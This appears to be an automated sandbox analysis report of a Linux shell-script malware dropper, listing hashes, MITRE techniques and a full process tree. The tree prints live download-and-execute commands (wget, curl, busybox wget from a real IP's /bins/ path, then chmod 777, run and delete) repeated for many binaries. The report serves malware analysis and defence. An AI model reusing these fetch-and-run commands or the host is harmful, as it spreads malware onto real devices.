Analysis
- max time kernel: 65s
- max time network: 69s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 14-11-2024 02:53
Static task
- static1
Behavioral tasks
- behavioral1: Sample a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh, Resource ubuntu1804-amd64-20240508-en
- behavioral2: Sample a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh, Resource debian9-armhf-20240611-en
- behavioral3: Sample a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh, Resource debian9-mipsbe-20240729-en
- behavioral4: Sample a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh, Resource debian9-mipsel-20240611-en
General
- Target: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
- Size: 10KB
- MD5: 920017685299c34fe40ed0d31390a654
- SHA1: 15be0738ab44434517b3a1bb41d0ba9752f0da28
- SHA256: a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
- SHA512: 345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
- SSDEEP: 192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 17 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 690 chmod; 749 chmod; 763 chmod; 794 chmod; 814 chmod; 680 chmod; 778 chmod; 806 chmod; 832 chmod; 840 chmod; 720 chmod; 820 chmod; 846 chmod; 854 chmod; 860 chmod; 868 chmod; 826 chmod
- Executes dropped EXE (17 IoCs)
  Processes (ioc, pid, process):
  - /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH, 682, 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy, 691, qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  - /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz, 722, V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  - /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4, 750, 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  - /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932, 764, 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  - /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD, 780, lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP, 796, 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw, 807, dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  - /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs, 815, gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  - /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z, 821, 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  - /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db, 827, S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  - /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq, 833, IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  - /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ, 841, ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  - /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt, 847, xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
  - /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH, 855, 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD, 861, lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP, 869, 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
- Checks CPU configuration (1 TTPs, 17 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes (description, ioc, process): File opened for reading, /proc/cpuinfo, curl (17 identical events, one per curl process)
- Reads runtime system information
  Processes (description, ioc, process): File opened for reading, /proc/sys/crypto/fips_enabled, curl (17 events); File opened for reading, /proc/self/auxv, curl (17 events)
- System Network Configuration Discovery (1 TTPs, 5 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes (pid, process): 843 wget; 844 curl; 845 busybox; 847 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt; 848 rm
- Writes file to tmp directory (17 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
  - File opened for modification, /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz, curl
  - File opened for modification, /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw, curl
  - File opened for modification, /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs, curl
  - File opened for modification, /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z, curl
  - File opened for modification, /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ, curl
  - File opened for modification, /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH, curl
  - File opened for modification, /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy, curl
  - File opened for modification, /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4, curl
  - File opened for modification, /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932, curl
  - File opened for modification, /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP, curl
  - File opened for modification, /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP, curl
  - File opened for modification, /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH, curl
  - File opened for modification, /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db, curl
  - File opened for modification, /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD, curl
  - File opened for modification, /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt, curl
  - File opened for modification, /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD, curl
  - File opened for modification, /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq, curl
Processes
- /tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh (PID 650): /tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
  - /bin/rm (PID 658): /bin/rm bins.sh
  - /usr/bin/wget (PID 660): wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /usr/bin/curl (PID 668): curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 677): /bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /bin/chmod (PID 680): chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: File and Directory Permissions Modification
  - /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH (PID 682): ./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: Executes dropped EXE
  - /bin/rm (PID 683): rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /usr/bin/wget (PID 685): wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  - /usr/bin/curl (PID 687): curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 689): /bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  - /bin/chmod (PID 690): chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
    Signatures: File and Directory Permissions Modification
  - /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy (PID 691): ./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
    Signatures: Executes dropped EXE
  - /bin/rm (PID 692): rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy
  - /usr/bin/wget (PID 693): wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  - /usr/bin/curl (PID 694): curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 699): /bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  - /bin/chmod (PID 720): chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
    Signatures: File and Directory Permissions Modification
  - /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz (PID 722): ./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
    Signatures: Executes dropped EXE
  - /bin/rm (PID 723): rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz
  - /usr/bin/wget (PID 725): wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  - /usr/bin/curl (PID 735): curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 747): /bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  - /bin/chmod (PID 749): chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
    Signatures: File and Directory Permissions Modification
  - /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 (PID 750): ./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
    Signatures: Executes dropped EXE
  - /bin/rm (PID 751): rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4
  - /usr/bin/wget (PID 752): wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  - /usr/bin/curl (PID 755): curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 759): /bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  - /bin/chmod (PID 763): chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
    Signatures: File and Directory Permissions Modification
  - /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 (PID 764): ./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
    Signatures: Executes dropped EXE
  - /bin/rm (PID 765): rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932
  - /usr/bin/wget (PID 766): wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /usr/bin/curl (PID 770): curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 775): /bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /bin/chmod (PID 778): chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: File and Directory Permissions Modification
  - /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD (PID 780): ./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: Executes dropped EXE
  - /bin/rm (PID 781): rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /usr/bin/wget (PID 782): wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /usr/bin/curl (PID 786): curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 792): /bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /bin/chmod (PID 794): chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: File and Directory Permissions Modification
  - /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP (PID 796): ./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: Executes dropped EXE
  - /bin/rm (PID 797): rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /usr/bin/wget (PID 799): wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  - /usr/bin/curl (PID 804): curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 805): /bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  - /bin/chmod (PID 806): chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
    Signatures: File and Directory Permissions Modification
  - /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw (PID 807): ./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
    Signatures: Executes dropped EXE
  - /bin/rm (PID 808): rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
  - /usr/bin/wget (PID 809): wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  - /usr/bin/curl (PID 811): curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 813): /bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  - /bin/chmod (PID 814): chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
    Signatures: File and Directory Permissions Modification
  - /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs (PID 815): ./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
    Signatures: Executes dropped EXE
  - /bin/rm (PID 816): rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs
  - /usr/bin/wget (PID 817): wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  - /usr/bin/curl (PID 818): curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 819): /bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  - /bin/chmod (PID 820): chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
    Signatures: File and Directory Permissions Modification
  - /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z (PID 821): ./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
    Signatures: Executes dropped EXE
  - /bin/rm (PID 822): rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z
  - /usr/bin/wget (PID 823): wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  - /usr/bin/curl (PID 824): curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 825): /bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  - /bin/chmod (PID 826): chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
    Signatures: File and Directory Permissions Modification
  - /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db (PID 827): ./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
    Signatures: Executes dropped EXE
  - /bin/rm (PID 828): rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db
  - /usr/bin/wget (PID 829): wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  - /usr/bin/curl (PID 830): curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 831): /bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  - /bin/chmod (PID 832): chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
    Signatures: File and Directory Permissions Modification
  - /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq (PID 833): ./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
    Signatures: Executes dropped EXE
  - /bin/rm (PID 834): rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq
  - /usr/bin/wget (PID 835): wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  - /usr/bin/curl (PID 836): curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 837): /bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  - /bin/chmod (PID 840): chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
    Signatures: File and Directory Permissions Modification
  - /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ (PID 841): ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
    Signatures: Executes dropped EXE
  - /bin/rm (PID 842): rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ
  - /usr/bin/wget (PID 843): wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: System Network Configuration Discovery
  - /usr/bin/curl (PID 844): curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
  - /bin/busybox (PID 845): /bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: System Network Configuration Discovery
  - /bin/chmod (PID 846): chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: File and Directory Permissions Modification
  - /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt (PID 847): ./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: Executes dropped EXE; System Network Configuration Discovery
  - /bin/rm (PID 848): rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
    Signatures: System Network Configuration Discovery
  - /usr/bin/wget (PID 849): wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /usr/bin/curl (PID 850): curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 853): /bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /bin/chmod (PID 854): chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: File and Directory Permissions Modification
  - /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH (PID 855): ./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
    Signatures: Executes dropped EXE
  - /bin/rm (PID 856): rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH
  - /usr/bin/wget (PID 857): wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /usr/bin/curl (PID 858): curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 859): /bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /bin/chmod (PID 860): chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: File and Directory Permissions Modification
  - /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD (PID 861): ./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
    Signatures: Executes dropped EXE
  - /bin/rm (PID 862): rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD
  - /usr/bin/wget (PID 863): wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /usr/bin/curl (PID 864): curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  - /bin/busybox (PID 867): /bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /bin/chmod (PID 868): chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: File and Directory Permissions Modification
  - /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP (PID 869): ./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
    Signatures: Executes dropped EXE
  - /bin/rm (PID 870): rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP
  - /usr/bin/wget (PID 871): wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97